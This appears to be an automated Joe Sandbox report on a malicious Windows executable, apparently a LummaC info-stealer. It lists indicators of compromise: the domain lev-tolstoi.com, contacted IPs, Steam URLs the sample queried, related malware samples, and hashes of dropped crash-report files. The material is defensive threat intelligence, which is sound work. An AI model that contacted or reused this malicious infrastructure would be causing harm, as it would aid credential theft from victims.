                                                                                                                                                                                                              https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgHK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gifHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&ampHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://help.steampowered.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        https://api.steampowered.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://store.steampowered.com/account/cookiepreferences/HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2138966821.0000000000619000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000002.2488368597.0000000000619000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://store.steampowered.com/mobileHK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://steamcommunity.com/HK8IIasL9i.exe, 00000000.00000003.2129420517.000000000066D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81HK8IIasL9i.exe, 00000000.00000003.2129274532.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2129310310.0000000000629000.00000004.00000020.00020000.00000000.sdmp, HK8IIasL9i.exe, 00000000.00000003.2107333028.00000000006B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                  104.21.66.86
                                                                                                                                                                                                                                  lev-tolstoi.comUnited States
                                                                                                                                                                                                                                  13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  23.55.153.106
                                                                                                                                                                                                                                  steamcommunity.comUnited States
                                                                                                                                                                                                                                  20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                  Analysis ID:1579755
                                                                                                                                                                                                                                  Start date and time:2024-12-23 08:37:22 +01:00
                                                                                                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                  Overall analysis duration:0h 5m 13s
                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                  Number of analysed new started processes analysed:8
                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                  Sample name:HK8IIasL9i.exe
                                                                                                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                                                                                                  Original Sample Name:7dc18a69dcdca002579bfde5d5427ff2.exe
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal100.troj.evad.winEXE@2/5@10/2
                                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 92%
                                                                                                                                                                                                                                  • Number of executed functions: 15
                                                                                                                                                                                                                                  • Number of non-executed functions: 215
                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 20.42.65.92, 40.126.53.18, 4.245.163.56, 13.107.246.63
                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                                  02:38:14API Interceptor9x Sleep call for process: HK8IIasL9i.exe modified
                                                                                                                                                                                                                                  02:38:57API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                  • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                                  23.55.153.106OGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                          xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                              s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                  9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      lev-tolstoi.comNfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.157.254
                                                                                                                                                                                                                                                      0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      20yLTIU4mS.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      Qsqi9KQXgy.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      steamcommunity.comOGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      AKAMAI-ASN1EUOGBLsboKIF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      NfwBtCx5PR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      pJRiqnTih0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      xxLuwS60RS.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      5RjjCWZAVv.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      s31ydU1MpQ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      TmmiCE5Ulm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      9pyUjy2elE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0gnHF2twcT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      CLOUDFLARENETUSFjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.150.173
                                                                                                                                                                                                                                                      mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.150.173
                                                                                                                                                                                                                                                      w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.150.173
                                                                                                                                                                                                                                                      pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.150.173
                                                                                                                                                                                                                                                      LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.32.96
                                                                                                                                                                                                                                                      0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.150.173
                                                                                                                                                                                                                                                      zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.36.201
                                                                                                                                                                                                                                                      0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.199.72
                                                                                                                                                                                                                                                      Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.36.201
                                                                                                                                                                                                                                                      NE4jxHLxXJ.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 172.67.199.72
                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1QQ5BxgG5G6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      FjFeChttqA.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      mG83m82qhF.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      w23Vg439U1.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      pfY4k1qisn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      LP4a6BowQN.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0OkLsJL2Bn.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      zLP3oiwG1g.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      0HdDuWzp54.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      Yh6fS6qfTE.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):65536
                                                                                                                                                                                                                                                      Entropy (8bit):0.9702008826300067
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:wZUoztTXTuQsYhry72f1QXIDcQ4c6VZcEbcw31+HbHg/wWGTf3hOyc45WAU6NCUc:UUoZuQ00m/h2jsFmmzuiFeZ24IO8L
                                                                                                                                                                                                                                                      MD5:8D78755BFC3CFBCF5045B8D66B006B2D
                                                                                                                                                                                                                                                      SHA1:87212E49188FE00D9BE995540B571C6B67226211
                                                                                                                                                                                                                                                      SHA-256:42BE52EE0A3325F1F784889080FCFB51C8168EF8B8E4976AE822796AFA3116B2
                                                                                                                                                                                                                                                      SHA-512:56EDAB7ED11461EBF731FF6B3DFEBC532B816AA79E34BF06D4E218EF3546AF0A308F7D3C099F4496771BC5BA7F323D7CF209ECC125F3FFEBF3CA75EB287C0BDD
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.1.3.1.0.3.8.5.6.8.6.4.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.4.1.3.1.0.5.1.6.9.3.6.2.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.2.7.6.c.a.9.5.-.5.3.9.e.-.4.b.f.3.-.8.9.4.9.-.e.a.2.c.f.e.6.4.7.6.c.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.d.6.b.0.8.b.a.-.1.b.d.5.-.4.4.7.7.-.9.2.8.3.-.6.8.c.c.7.9.8.f.3.3.9.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.H.K.8.I.I.a.s.L.9.i...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.4.0.-.0.0.0.1.-.0.0.1.4.-.5.c.d.9.-.7.7.9.f.0.d.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.8.5.f.5.8.f.4.0.7.a.3.1.e.0.0.c.b.f.b.5.0.5.f.0.e.2.3.a.1.e.7.0.0.0.0.f.f.f.f.!.0.0.0.0.3.b.3.0.5.c.b.3.e.2.0.e.4.8.c.b.0.b.0.5.3.2.1.8.5.e.4.9.1.3.6.5.1.1.8.3.8.9.8.7.!.H.K.8.I.I.a.s.L.9.i...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:Mini DuMP crash report, 15 streams, Mon Dec 23 07:38:24 2024, 0x1205a4 type
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):51164
                                                                                                                                                                                                                                                      Entropy (8bit):2.7221120260250515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:69QXftNlkWKFSOp1B73Stb+PmW0/t7S4jJ3tLg0Yih4Ei+IOoiDr3fr5doFk3y:bN1KFt7B73gbnd9sih7lpPvr9C
                                                                                                                                                                                                                                                      MD5:06394B4E404A8FC0A6B3D4EAA67AEBC1
                                                                                                                                                                                                                                                      SHA1:375252123C498BB8794FACC233046CD5188F9BE6
                                                                                                                                                                                                                                                      SHA-256:E77C63D48B3C16EC3E98C9C78D0C63E00C5EEF406E9E6ADE450B3C04782B6549
                                                                                                                                                                                                                                                      SHA-512:82E0BDBBB0176F4D7BBEF809139C4C1DE90174BB43CF5097F670892BF76A5F906FBA4604064A7AE911936126442BD46AE9EAB446315D6EB4DBAF08BA549D81CF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Preview:MDMP..a..... .......p.ig............4...............H...................................`.......8...........T............B.......................... ..............................................................................eJ......d!......GenuineIntel............T.......@...e.ig.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8312
                                                                                                                                                                                                                                                      Entropy (8bit):3.6992103565461036
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJvsb6v6YEImSUOo3gmfsspDg89b+ssfwocqm:R6lXJg6v6YEJSUOo3gmfs8+/fwog
                                                                                                                                                                                                                                                      MD5:25178D4F97700533A38E8450D7E0E628
                                                                                                                                                                                                                                                      SHA1:F4B476B0133E4ED3BE1A502794FCD8A6782CFF42
                                                                                                                                                                                                                                                      SHA-256:BA72DDA581C870D48489BD82B82371EB96A16BEDE9EC6E6CF76B7D69AA9E53BA
                                                                                                                                                                                                                                                      SHA-512:F4D7F2A1C59216303A66AE06FAC9A9AD1280346AC61732374F7E1F3F460CE7201296B61033D3776EEA4201359F2123BA00F02F67DE02E9B94482811FDC2C2866
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.2.0.<./.P.i.
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4579
                                                                                                                                                                                                                                                      Entropy (8bit):4.474945028529214
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsnyJg77aI92xWpW8VYAYm8M4JtKXiFFlo+q8fOpYcHX9zDpd:uIjfnAI7og7VcJfeY2tzDpd
                                                                                                                                                                                                                                                      MD5:FC606AD62C5EFAE7E3F92900F788478C
                                                                                                                                                                                                                                                      SHA1:D76D5DF4554AB0911CC1441D5EC4DA4AB0680654
                                                                                                                                                                                                                                                      SHA-256:845D1E07BCA4BD8F2852175E9B86AF59E53C24BA0B0077A4E4B860A3C455A709
                                                                                                                                                                                                                                                      SHA-512:5D57A25019A5161173F910E97C88DFC145BC55C601188419DD5D1F75B9CF547A94E9661EAA333DE4279F26F4754362202E735812DF4A1668C20AC968C9D6B241
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643601" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1835008
                                                                                                                                                                                                                                                      Entropy (8bit):4.421551975200269
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:jSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNF0uhiTw:uvloTMW+EZMM6DFyX03w
                                                                                                                                                                                                                                                      MD5:BF2FC4E2096259600612FF708BF9C7B1
                                                                                                                                                                                                                                                      SHA1:663CB4AF1A0B0DAAAC65EB25EC2114BE4AC1EBF8
                                                                                                                                                                                                                                                      SHA-256:E806BFEBDF1668420B4F9749B2A8613C52E4951D4AE4AF65C93CBCEB5FCA8FC1
                                                                                                                                                                                                                                                      SHA-512:452E98371D602DCAB6600979F862992FD5E91E5629C097B4E097DE9D75FBB1329B55A447A5D81AA1DFC6B3E3D6CE4842A618B3F7F984CD1EBB9368C4584456B1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                      Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmV.s..U...............................................................................................................................................................................................................................................................................................................................................Nd.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):7.377624112978058
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                      File name:HK8IIasL9i.exe
